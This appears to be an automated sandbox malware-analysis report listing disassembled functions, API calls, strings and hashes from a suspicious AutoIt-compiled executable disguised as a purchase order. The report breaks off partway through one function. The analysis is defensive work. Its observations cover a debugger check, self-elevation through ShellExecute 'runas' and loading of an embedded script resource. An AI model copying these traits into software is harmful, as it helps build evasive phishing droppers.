                      control_flow_graph 641 abbdf6-abbe33 call ac0650 644 abbe3c-abbe3e 641->644 645 abbe35-abbe37 641->645 647 abbe5f-abbe8c 644->647 648 abbe40-abbe5a call ab886a call ab889e call ab7aa0 644->648 646 abc613-abc61f call abb4bf 645->646 649 abbe8e-abbe91 647->649 650 abbe93-abbe9a 647->650 648->646 649->650 653 abbebe-abbec3 649->653 654 abbeb8 650->654 655 abbe9c-abbeb3 call ab886a call ab889e call ab7aa0 650->655 659 abbed2-abbee0 call ac49a2 653->659 660 abbec5-abbecf call ac05df 653->660 654->653 690 abc604-abc607 655->690 671 abc1fe-abc210 659->671 672 abbee6-abbef8 659->672 660->659 675 abc56b-abc588 WriteFile 671->675 676 abc216-abc226 671->676 672->671 674 abbefe-abbf36 call ab869d GetConsoleMode 672->674 674->671 694 abbf3c-abbf42 674->694 682 abc58a-abc592 675->682 683 abc594-abc59a GetLastError 675->683 679 abc30d-abc312 676->679 680 abc22c-abc237 676->680 685 abc318-abc321 679->685 686 abc416-abc421 679->686 688 abc5ce-abc5e6 680->688 689 abc23d-abc24d 680->689 684 abc59c 682->684 683->684 691 abc5a2-abc5a4 684->691 685->688 692 abc327 685->692 686->688 698 abc427 686->698 696 abc5e8-abc5eb 688->696 697 abc5f1-abc601 call ab889e call ab886a 688->697 695 abc253-abc256 689->695 693 abc611-abc612 690->693 700 abc609-abc60f 691->700 701 abc5a6-abc5a8 691->701 702 abc331-abc348 692->702 693->646 703 abbf4c-abbf6f GetConsoleCP 694->703 704 abbf44-abbf46 694->704 705 abc258-abc271 695->705 706 abc29c-abc2d3 WriteFile 695->706 696->697 707 abc5ed-abc5ef 696->707 697->690 708 abc431-abc446 698->708 700->693 701->688 711 abc5aa-abc5af 701->711 712 abc34e-abc351 702->712 713 abc1f3-abc1f9 703->713 714 abbf75-abbf7d 703->714 704->671 704->703 715 abc27e-abc29a 705->715 716 abc273-abc27d 705->716 706->683 717 abc2d9-abc2eb 706->717 707->693 709 abc44c-abc44e 708->709 718 abc48b-abc4cc WideCharToMultiByte 709->718 719 abc450-abc466 709->719 721 abc5b1-abc5c3 call ab889e call ab886a 711->721 722 abc5c5-abc5cc call ab887d 711->722 723 abc353-abc369 712->723 724 abc391-abc3da WriteFile 712->724 713->701 725 abbf87-abbf89 714->725 715->695 715->706 716->715 717->691 726 abc2f1-abc302 717->726 718->683 731 abc4d2-abc4d4 718->731 728 abc47a-abc489 719->728 729 abc468-abc477 719->729 721->690 722->690 733 abc36b-abc37d 723->733 734 abc380-abc38f 723->734 724->683 736 abc3e0-abc3f8 724->736 737 abbf8f-abbfb1 725->737 738 abc11e-abc121 725->738 726->689 727 abc308 726->727 727->691 728->709 728->718 729->728 741 abc4da-abc50d WriteFile 731->741 733->734 734->712 734->724 736->691 744 abc3fe-abc40b 736->744 745 abbfca-abbfd6 call ab22a8 737->745 746 abbfb3-abbfc8 737->746 739 abc128-abc155 738->739 740 abc123-abc126 738->740 747 abc15b-abc15e 739->747 740->739 740->747 748 abc50f-abc529 741->748 749 abc52d-abc541 GetLastError 741->749 744->702 751 abc411 744->751 761 abbfd8-abbfec 745->761 762 abc01c-abc01e 745->762 752 abc024-abc036 call ac4ea7 746->752 755 abc160-abc163 747->755 756 abc165-abc178 call ac6634 747->756 748->741 757 abc52b 748->757 760 abc547-abc549 749->760 751->691 771 abc1e8-abc1ee 752->771 772 abc03c 752->772 755->756 763 abc1ba-abc1bd 755->763 756->683 775 abc17e-abc188 756->775 757->760 760->684 766 abc54b-abc563 760->766 768 abbff2-abc007 call ac4ea7 761->768 769 abc1c5-abc1e0 761->769 762->752 763->725 767 abc1c3 763->767 766->708 773 abc569 766->773 767->771 768->771 781 abc00d-abc01a 768->781 769->771 771->684 776 abc042-abc077 WideCharToMultiByte 772->776 773->691 778 abc18a-abc1a1 call ac6634 775->778 779 abc1ae-abc1b4 775->779 776->771 780 abc07d-abc0a3 WriteFile 776->780 778->683 786 abc1a7-abc1a8 778->786 779->763 780->683 783 abc0a9-abc0c1 780->783 781->776 783->771 785 abc0c7-abc0ce 783->785 785->779 787 abc0d4-abc0ff WriteFile 785->787 786->779 787->683 788 abc105-abc10c 787->788 788->771 789 abc112-abc119 788->789 789->779
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 02b47647f8459f4050b65bb74434fb3e90851c0ff66a8fba4bca3fb8037bfeb5
                      • Instruction ID: 654fda8eea8c141d57ada46896f62a70242dc7ccdcbc0ec5bbaebfb8a1d2a52d
                      • Opcode Fuzzy Hash: 02b47647f8459f4050b65bb74434fb3e90851c0ff66a8fba4bca3fb8037bfeb5
                      • Instruction Fuzzy Hash: F5326E75B022288FDB24DF58DD40AE9B7B9FB46320F4441D9E40AE7A86D7749E80CF52
                      Function 00A9374E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 145windowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00A9376D
                        • Part of subcall function 00A94257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe,00000104,?,00000000,00000001,00000000), ref: 00A9428C
                      • IsDebuggerPresent.KERNEL32(?,?), ref: 00A9377F
                      • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe,00000104,?,00B51120,C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe,00B51124,?,?), ref: 00A937EE
                        • Part of subcall function 00A934F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00A9352A
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A93860
                      • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00B42934,00000010), ref: 00B021C5
                      • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00B021FD
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00B02232
                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B2DAA4), ref: 00B02290
                      • ShellExecuteW.SHELL32(00000000), ref: 00B02297
                        • Part of subcall function 00A930A5: GetSysColorBrush.USER32(0000000F), ref: 00A930B0
                        • Part of subcall function 00A930A5: LoadCursorW.USER32(00000000,00007F00), ref: 00A930BF
                        • Part of subcall function 00A930A5: LoadIconW.USER32(00000063), ref: 00A930D5
                        • Part of subcall function 00A930A5: LoadIconW.USER32(000000A4), ref: 00A930E7
                        • Part of subcall function 00A930A5: LoadIconW.USER32(000000A2), ref: 00A930F9
                        • Part of subcall function 00A930A5: RegisterClassExW.USER32(?), ref: 00A93167
                        • Part of subcall function 00A92E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A92ECB
                        • Part of subcall function 00A92E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A92EEC
                        • Part of subcall function 00A92E9D: ShowWindow.USER32(00000000), ref: 00A92F00
                        • Part of subcall function 00A92E9D: ShowWindow.USER32(00000000), ref: 00A92F09
                        • Part of subcall function 00A93598: _memset.LIBCMT ref: 00A935BE
                        • Part of subcall function 00A93598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A93667
                      Strings
                      • runas, xrefs: 00B0228B
                      • C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe, xrefs: 00A937B4, 00A937E9, 00A937FD, 00B02257
                      • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 00B021BE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                      • String ID: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                      • API String ID: 4253510256-3107070810
                      • Opcode ID: 3e3857b69b175e6dd0c8fc6de2720d5443ed1cc23499b3f6ed0a8c7c8dff9fe3
                      • Instruction ID: a566485c35d7429f6abf8195b819dc02a4376ab642982591066834501f19de18
                      • Opcode Fuzzy Hash: 3e3857b69b175e6dd0c8fc6de2720d5443ed1cc23499b3f6ed0a8c7c8dff9fe3
                      • Instruction Fuzzy Hash: 69512676744244BACF10ABA4EC46FED3BF89B09711F0084E6FB51A31E1CE704A49CB62
                      Function 00AAE47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1270 aae47b-aae50a call a9d3d2 GetVersionExW call a97e53 call aae5f8 call aae617 1279 b029f9-b029fc 1270->1279 1280 aae510-aae511 1270->1280 1281 b02a15-b02a19 1279->1281 1282 b029fe 1279->1282 1283 aae54d-aae55d call aae6d1 1280->1283 1284 aae513-aae51e 1280->1284 1287 b02a04-b02a0d 1281->1287 1288 b02a1b-b02a24 1281->1288 1286 b02a01 1282->1286 1297 aae55f-aae57c GetCurrentProcess call aae70e 1283->1297 1298 aae582-aae59c 1283->1298 1289 aae524-aae526 1284->1289 1290 b0297f-b02985 1284->1290 1286->1287 1287->1281 1288->1286 1294 b02a26-b02a29 1288->1294 1295 aae52c-aae52f 1289->1295 1296 b0299a-b029a6 1289->1296 1292 b02987-b0298a 1290->1292 1293 b0298f-b02995 1290->1293 1292->1283 1293->1283 1294->1287 1301 b029c6-b029c9 1295->1301 1302 aae535-aae544 1295->1302 1299 b029b0-b029b6 1296->1299 1300 b029a8-b029ab 1296->1300 1297->1298 1321 aae57e 1297->1321 1307 aae59e-aae5b2 call aae694 1298->1307 1308 aae5ec-aae5f6 GetSystemInfo 1298->1308 1299->1283 1300->1283 1301->1283 1303 b029cf-b029e4 1301->1303 1304 aae54a 1302->1304 1305 b029bb-b029c1 1302->1305 1309 b029e6-b029e9 1303->1309 1310 b029ee-b029f4 1303->1310 1304->1283 1305->1283 1318 aae5e4-aae5ea GetSystemInfo 1307->1318 1319 aae5b4-aae5bc call aae437 GetNativeSystemInfo 1307->1319 1312 aae5c9-aae5d5 1308->1312 1309->1283 1310->1283 1314 aae5dc-aae5e1 1312->1314 1315 aae5d7-aae5da FreeLibrary 1312->1315 1315->1314 1320 aae5be-aae5c2 1318->1320 1319->1320 1320->1312 1324 aae5c4-aae5c7 FreeLibrary 1320->1324 1321->1298 1324->1312
                      APIs
                      • GetVersionExW.KERNEL32(?), ref: 00AAE4A7
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                      • GetCurrentProcess.KERNEL32(00000000,00B2DC28,?,?), ref: 00AAE567
                      • GetNativeSystemInfo.KERNEL32(?,00B2DC28,?,?), ref: 00AAE5BC
                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00AAE5C7
                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00AAE5DA
                      • GetSystemInfo.KERNEL32(?,00B2DC28,?,?), ref: 00AAE5E4
                      • GetSystemInfo.KERNEL32(?,00B2DC28,?,?), ref: 00AAE5F0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                      • String ID:
                      • API String ID: 2717633055-0
                      • Opcode ID: 2b2940cf4567c9bfff094bfb0432fe746eca6ec2ad956cb639f9e9cd863a0fb9
                      • Instruction ID: adb424494a03da26303f0271da61e9b37ae1aa66c16bab8215b091fe70149af0
                      • Opcode Fuzzy Hash: 2b2940cf4567c9bfff094bfb0432fe746eca6ec2ad956cb639f9e9cd863a0fb9
                      • Instruction Fuzzy Hash: F861C0B1809284DFCF16CF68A8C51E97FB5AF2A304F2945D9D8449B287D734C908CF65
                      Function 00A931F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1342 a931f2-a9320a CreateStreamOnHGlobal 1343 a9322a-a9322d 1342->1343 1344 a9320c-a93223 FindResourceExW 1342->1344 1345 a93229 1344->1345 1346 b057d3-b057e2 LoadResource 1344->1346 1345->1343 1346->1345 1347 b057e8-b057f6 SizeofResource 1346->1347 1347->1345 1348 b057fc-b05807 LockResource 1347->1348 1348->1345 1349 b0580d-b05815 1348->1349 1350 b05819-b0582b 1349->1350 1350->1345
                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00A93202
                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00A93219
                      • LoadResource.KERNEL32(?,00000000), ref: 00B057D7
                      • SizeofResource.KERNEL32(?,00000000), ref: 00B057EC
                      • LockResource.KERNEL32(?), ref: 00B057FF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                      • String ID: SCRIPT
                      • API String ID: 3051347437-3967369404
                      • Opcode ID: 58f44f36edfd801804ddf2056b622bf6acecf01b4bcdc028de32d080cfb8115b
                      • Instruction ID: 6733fb2e195bf38a9c82318bede612435f4f724ffe5bde083afb078b3e0b9945
                      • Opcode Fuzzy Hash: 58f44f36edfd801804ddf2056b622bf6acecf01b4bcdc028de32d080cfb8115b
                      • Instruction Fuzzy Hash: 02115A71200701BFEB258B65EC48FA77BFAEBC9B41F208068B41287190DA71DD00CA61
                      Function 00AA2B40 Relevance: 6.6, APIs: 2, Strings: 1, Instructions: 1382COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                        • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                      • _memmove.LIBCMT ref: 00AA2C63
                      • _memmove.LIBCMT ref: 00AA303A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                      • String ID: @
                      • API String ID: 1300846289-2766056989
                      • Opcode ID: e3cf76505b27cd46b72706097d42c70aac2799a3631fc7d2725edeaaea38cfe8
                      • Instruction ID: 192e61a736671b7172b1dd1dbef85c39af6bd334e42a72fca38bf16d4ac94eaf
                      • Opcode Fuzzy Hash: e3cf76505b27cd46b72706097d42c70aac2799a3631fc7d2725edeaaea38cfe8
                      • Instruction Fuzzy Hash: E1C26B75A002059FCF14DF58C980BAEBBB5FF4A300F248199E846AB391DB35EE55CB91
                      Function 00AADD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                      Download Yara Rule
                      APIs
                      • GetFileAttributesW.KERNEL32(00A9C848,00A9C848), ref: 00AADDA2
                      • FindFirstFileW.KERNEL32(00A9C848,?), ref: 00B04A83
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: File$AttributesFindFirst
                      • String ID:
                      • API String ID: 4185537391-0
                      • Opcode ID: 4f445e3f1b6d2bdaebb4b1b8a813ee8a094110514edd75159fe9936bad18e66c
                      • Instruction ID: 662331164f805bbd1105fe2ee3664e180e0d4b53ed9f32450571f33eefb76f39
                      • Opcode Fuzzy Hash: 4f445e3f1b6d2bdaebb4b1b8a813ee8a094110514edd75159fe9936bad18e66c
                      • Instruction Fuzzy Hash: 59E0DF72815411BB93146738EC0D8EA3BAC9E06338B604759F976D30E0EF70AD6486DA
                      Function 00A9E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                      Download Yara Rule
                      APIs
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A9E279
                      • timeGetTime.WINMM ref: 00A9E51A
                      • TranslateMessage.USER32(?), ref: 00A9E646
                      • DispatchMessageW.USER32(?), ref: 00A9E651
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A9E664
                      • LockWindowUpdate.USER32(00000000), ref: 00A9E697
                      • DestroyWindow.USER32 ref: 00A9E6A3
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A9E6BD
                      • Sleep.KERNEL32(0000000A), ref: 00B05B15
                      • TranslateMessage.USER32(?), ref: 00B062AF
                      • DispatchMessageW.USER32(?), ref: 00B062BD
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B062D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                      • API String ID: 2641332412-570651680
                      • Opcode ID: bfaf6a1abcc529cc651892f0a177946c017b0aedbda9d0ef6296b47d29f97e8d
                      • Instruction ID: 3e2573f2b4d2309f53245c114765ee2843a2ed07c4c694aa46ef8fb1eaa602ac
                      • Opcode Fuzzy Hash: bfaf6a1abcc529cc651892f0a177946c017b0aedbda9d0ef6296b47d29f97e8d
                      • Instruction Fuzzy Hash: A362A070604341DFDB24DF24C985BAA7BE4BF45304F1449ADF94A8B2D2DB75E888CB62
                      Function 00AC6A28 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • ___createFile.LIBCMT ref: 00AC6C73
                      • ___createFile.LIBCMT ref: 00AC6CB4
                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00AC6CDD
                      • __dosmaperr.LIBCMT ref: 00AC6CE4
                      • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AC6CF7
                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00AC6D1A
                      • __dosmaperr.LIBCMT ref: 00AC6D23
                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AC6D2C
                      • __set_osfhnd.LIBCMT ref: 00AC6D5C
                      • __lseeki64_nolock.LIBCMT ref: 00AC6DC6
                      • __close_nolock.LIBCMT ref: 00AC6DEC
                      • __chsize_nolock.LIBCMT ref: 00AC6E1C
                      • __lseeki64_nolock.LIBCMT ref: 00AC6E2E
                      • __lseeki64_nolock.LIBCMT ref: 00AC6F26
                      • __lseeki64_nolock.LIBCMT ref: 00AC6F3B
                      • __close_nolock.LIBCMT ref: 00AC6F9B
                        • Part of subcall function 00ABF84C: CloseHandle.KERNEL32(00000000,00B3EEC4,00000000,?,00AC6DF1,00B3EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ABF89C
                        • Part of subcall function 00ABF84C: GetLastError.KERNEL32(?,00AC6DF1,00B3EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ABF8A6
                        • Part of subcall function 00ABF84C: __free_osfhnd.LIBCMT ref: 00ABF8B3
                        • Part of subcall function 00ABF84C: __dosmaperr.LIBCMT ref: 00ABF8D5
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      • __lseeki64_nolock.LIBCMT ref: 00AC6FBD
                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AC70F2
                      • ___createFile.LIBCMT ref: 00AC7111
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00AC711E
                      • __dosmaperr.LIBCMT ref: 00AC7125
                      • __free_osfhnd.LIBCMT ref: 00AC7145
                      • __invoke_watson.LIBCMT ref: 00AC7173
                      • __wsopen_helper.LIBCMT ref: 00AC718D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                      • String ID: @
                      • API String ID: 3896587723-2766056989
                      • Opcode ID: b49a850ac14c1a732aa281a8eff4862dbdc2f386fd5a15357188930374ed8236
                      • Instruction ID: 37441f6666b841b2cada77032096c7c0ce0341c42b102c9a12712f056e3da0b5
                      • Opcode Fuzzy Hash: b49a850ac14c1a732aa281a8eff4862dbdc2f386fd5a15357188930374ed8236
                      • Instruction Fuzzy Hash: 082203719042059BEB25DF68DC51FED7B75EF04320F2A426DE921AB2E2C7398D50CB51
                      Function 00AE01E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • _wcscpy.LIBCMT ref: 00AE026A
                      • _wcschr.LIBCMT ref: 00AE0278
                      • _wcscpy.LIBCMT ref: 00AE028F
                      • _wcscat.LIBCMT ref: 00AE029E
                      • _wcscat.LIBCMT ref: 00AE02BC
                      • _wcscpy.LIBCMT ref: 00AE02DD
                      • __wsplitpath.LIBCMT ref: 00AE03BA
                      • _wcscpy.LIBCMT ref: 00AE03DF
                      • _wcscpy.LIBCMT ref: 00AE03F1
                      • _wcscpy.LIBCMT ref: 00AE0406
                      • _wcscat.LIBCMT ref: 00AE041B
                      • _wcscat.LIBCMT ref: 00AE042D
                      • _wcscat.LIBCMT ref: 00AE0442
                        • Part of subcall function 00ADC890: _wcscmp.LIBCMT ref: 00ADC92A
                        • Part of subcall function 00ADC890: __wsplitpath.LIBCMT ref: 00ADC96F
                        • Part of subcall function 00ADC890: _wcscpy.LIBCMT ref: 00ADC982
                        • Part of subcall function 00ADC890: _wcscat.LIBCMT ref: 00ADC995
                        • Part of subcall function 00ADC890: __wsplitpath.LIBCMT ref: 00ADC9BA
                        • Part of subcall function 00ADC890: _wcscat.LIBCMT ref: 00ADC9D0
                        • Part of subcall function 00ADC890: _wcscat.LIBCMT ref: 00ADC9E3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                      • String ID: >>>AUTOIT SCRIPT<<<
                      • API String ID: 2955681530-2806939583
                      • Opcode ID: 4de8a723fa2808a3eac8941082a8442784f8a649a53b2e03e81db9f2d18a7b6d
                      • Instruction ID: b251fcbd2f682ec6fc6c3248634712cb1102f05158f4640a72d0b74bed4e6eee
                      • Opcode Fuzzy Hash: 4de8a723fa2808a3eac8941082a8442784f8a649a53b2e03e81db9f2d18a7b6d
                      • Instruction Fuzzy Hash: 4491B671604741AFCB24EB64CA55F9FB3E8AF84310F04485DF5499B292EB74EA84CB92
                      Function 00A92F58 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53windowregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00A92F8B
